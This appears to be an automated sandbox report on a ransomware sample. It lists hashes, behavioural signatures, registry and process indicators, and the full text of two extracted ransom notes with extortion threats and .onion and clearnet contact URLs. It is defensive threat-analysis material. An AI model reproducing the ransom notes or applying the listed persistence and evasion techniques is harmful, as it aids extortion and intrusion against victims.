d10d3e09e1f93ccc06ccaa71c4b5e2bacaae2074024ffa7345362c01479ff5a8

General

Target

sample.exe
Size

142KB
MD5

e1f063d63a75e0e0e864052b1a50ab06
SHA1

75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
SHA256

8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
SHA512

25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: ____________________________________________________________________________________ You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. _____________________________________________________________________________________ Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: WMl+7qUDjFv06R+4Mn7wwRJLGABA4jRM63Eg8mMaP99z916bHvzrYk2sot6W1lYms4v1oQzKbKTDq+ZUf5rEblB9s1IWiKyRiI+zju4zTnRki8Qy3W/MqsTfc57aLL2GSaQMPSc40mWHrmGspTd8eUxEx1ZZ1zTm161WXpo0OCWinHSg2UEBVurMP+NqQdL4fg+A7jtEWDscl3ozoyWdAvQteTeubBeNyhQ/mvvADBCsPiLCuqURz7ofX6yIc6Y0JmdwFVe8e8wEE0ClGQ5tjlW55u0JEOn9BNbRrsZEGLsxlL5b6zsNJoOKR6tyrRI9Km0TwoE90PeO7GAQd1vAS+Zo6MosArYKVVE0M/RbZ5XxpUu+ejA/2mQep2ecEZkhfps9Y2gRGvzTKdxqFjQGR2T1ywZdLx3k99zfdijoqrsX6yx/z6f4u613ghLrr+rJ5eH/0UnWZQYeaIE58PNEZ3pZb8kmwHsFdwtlgOEOsIAsia12YsPMjKsN2bKQCI0h3sZwEQFVAv0maNPcJ0ZWkSrOwpbAj2CsQ+r91RI5/TpYOkfe5mM0fSA6bWA8C3lvj+jypT6HUcaXgZ/FXG/XJAULAaG2xxZ5kFuELSM//bf4CPrmfUVPLyTQ7VaZLvAttrIRQprsA4K5Oa3S8+iKmee5H15h/T/TS0BH0DRC23Q=

URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after itâ€™s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: WMl+7qUDjFv06R+4Mn7wwRJLGABA4jRM63Eg8mMaP99z916bHvzrYk2sot6W1lYms4v1oQzKbKTDq+ZUf5rEblB9s1IWiKyRiI+zju4zTnRki8Qy3W/MqsTfc57aLL2GSaQMPSc40mWHrmGspTd8eUxEx1ZZ1zTm161WXpo0OCWinHSg2UEBVurMP+NqQdL4fg+A7jtEWDscl3ozoyWdAvQteTeubBeNyhQ/mvvADBCsPiLCuqURz7ofX6yIc6Y0JmdwFVe8e8wEE0ClGQ5tjlW55u0JEOn9BNbRrsZEGLsxlL5b6zsNJoOKR6tyrRI9Km0TwoE90PeO7GAQd1vAS+Zo6MosArYKVVE0M/RbZ5XxpUu+ejA/2mQep2ecEZkhfps9Y2gRGvzTKdxqFjQGR2T1ywZdLx3k99zfdijoqrsX6yx/z6f4u613ghLrr+rJ5eH/0UnWZQYeaIE58PNEZ3pZb8kmwHsFdwtlgOEOsIAsia12YsPMjKsN2bKQCI0h3sZwEQFVAv0maNPcJ0ZWkSrOwpbAj2CsQ+r91RI5/TpYOkfe5mM0fSA6bWA8C3lvj+jypT6HUcaXgZ/FXG/XJAULAaG2xxZ5kFuELSM//bf4CPrmfUVPLyTQ7VaZLvAttrIRQprsA4K5Oa3S8+iKmee5H15h/T/TS0BH0DRC23Q=

URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Signatures

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

k3jnl3ar.exe

pid process

2748 k3jnl3ar.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

3048 cmd.exe
Drops startup file 1 IoCs

Processes:

sample.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk sample.exe
Loads dropped DLL 2 IoCs

Processes:

sample.exe

pid process

1748 sample.exe
2764

pid	process
2748	k3jnl3ar.exe

pid	process
3048	cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
792	taskkill.exe
1456	taskkill.exe
756	taskkill.exe
1524	taskkill.exe
1160	taskkill.exe
1720	taskkill.exe
2276	taskkill.exe
1276	taskkill.exe
456	taskkill.exe
1520	taskkill.exe
1352	taskkill.exe
1636	taskkill.exe
2064	taskkill.exe
2088	taskkill.exe
1460	taskkill.exe
1648	taskkill.exe
564	taskkill.exe
2024	taskkill.exe
432	taskkill.exe
616	taskkill.exe
2108	taskkill.exe
2232	taskkill.exe
1392	taskkill.exe
1148	taskkill.exe
1808	taskkill.exe
1812	taskkill.exe
836	taskkill.exe
1684	taskkill.exe
1640	taskkill.exe
1304	taskkill.exe
1512	taskkill.exe
1740	taskkill.exe
860	taskkill.exe
1500	taskkill.exe
1348	taskkill.exe
1152	taskkill.exe
1504	taskkill.exe
1552	taskkill.exe
1576	taskkill.exe
1572	taskkill.exe
1724	taskkill.exe
1568	taskkill.exe
656	taskkill.exe
524	taskkill.exe
568	taskkill.exe
2184	taskkill.exe
1596	taskkill.exe
332	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 47 IoCs

Processes:

NOTEPAD.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0c00000050000000a66a63283d95d211b5d600c04fd918d00b0000007800000030f125b7ef471a10a5f102608c9eebac0e00000078000000	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\LogicalViewMode = "1"	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Sort = 000000000000000000000000000000000200000030f125b7ef471a10a5f102608c9eebac0a0000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Mode = "4"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlot = "2"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_Classes\Local Settings	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48"	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}"	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1092616257"	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\IconSize = "16"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	NOTEPAD.EXE

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1112 reg.exe
Opens file in notepad (likely ransom note) 2 IoCs
ransomware

Processes:

NOTEPAD.EXENOTEPAD.EXE

pid process

544 NOTEPAD.EXE
2252 NOTEPAD.EXE
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2864 PING.EXE

pid	process
1112	reg.exe

pid	process
544	NOTEPAD.EXE
2252	NOTEPAD.EXE

pid	process
2864	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

sample.exe

pid	process
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe
1748	sample.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

NOTEPAD.EXE

pid process

544 NOTEPAD.EXE

pid	process
544	NOTEPAD.EXE

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

sample.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1748	sample.exe
Token: SeDebugPrivilege	1276	taskkill.exe
Token: SeDebugPrivilege	1460	taskkill.exe
Token: SeDebugPrivilege	456	taskkill.exe
Token: SeDebugPrivilege	756	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	1392	taskkill.exe
Token: SeDebugPrivilege	792	taskkill.exe
Token: SeDebugPrivilege	656	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	524	taskkill.exe
Token: SeDebugPrivilege	1684	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	332	taskkill.exe
Token: SeDebugPrivilege	1152	taskkill.exe
Token: SeDebugPrivilege	1148	taskkill.exe
Token: SeDebugPrivilege	1640	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	1504	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	1304	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeDebugPrivilege	1724	taskkill.exe
Token: SeDebugPrivilege	1456	taskkill.exe
Token: SeDebugPrivilege	1740	taskkill.exe
Token: SeDebugPrivilege	836	taskkill.exe
Token: SeDebugPrivilege	568	taskkill.exe
Token: SeDebugPrivilege	432	taskkill.exe
Token: SeDebugPrivilege	860	taskkill.exe
Token: SeDebugPrivilege	1520	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	616	taskkill.exe
Token: SeDebugPrivilege	1568	taskkill.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeDebugPrivilege	1352	taskkill.exe
Token: SeDebugPrivilege	1636	taskkill.exe
Token: SeDebugPrivilege	2064	taskkill.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	2184	taskkill.exe
Token: SeDebugPrivilege	2232	taskkill.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeDebugPrivilege	2320	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

sample.exemshta.exe

pid process

1748 sample.exe
1748 sample.exe
1748 sample.exe
2828 mshta.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

sample.exe

pid process

1748 sample.exe
1748 sample.exe
1748 sample.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

NOTEPAD.EXE

pid process

544 NOTEPAD.EXE

pid	process
544	NOTEPAD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

sample.exe

description	pid	process	target process
PID 1748 wrote to memory of 1276	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 1276	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 1276	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 464	1748	sample.exe	reg.exe
PID 1748 wrote to memory of 464	1748	sample.exe	reg.exe
PID 1748 wrote to memory of 464	1748	sample.exe	reg.exe
PID 1748 wrote to memory of 1112	1748	sample.exe	reg.exe
PID 1748 wrote to memory of 1112	1748	sample.exe	reg.exe
PID 1748 wrote to memory of 1112	1748	sample.exe	reg.exe
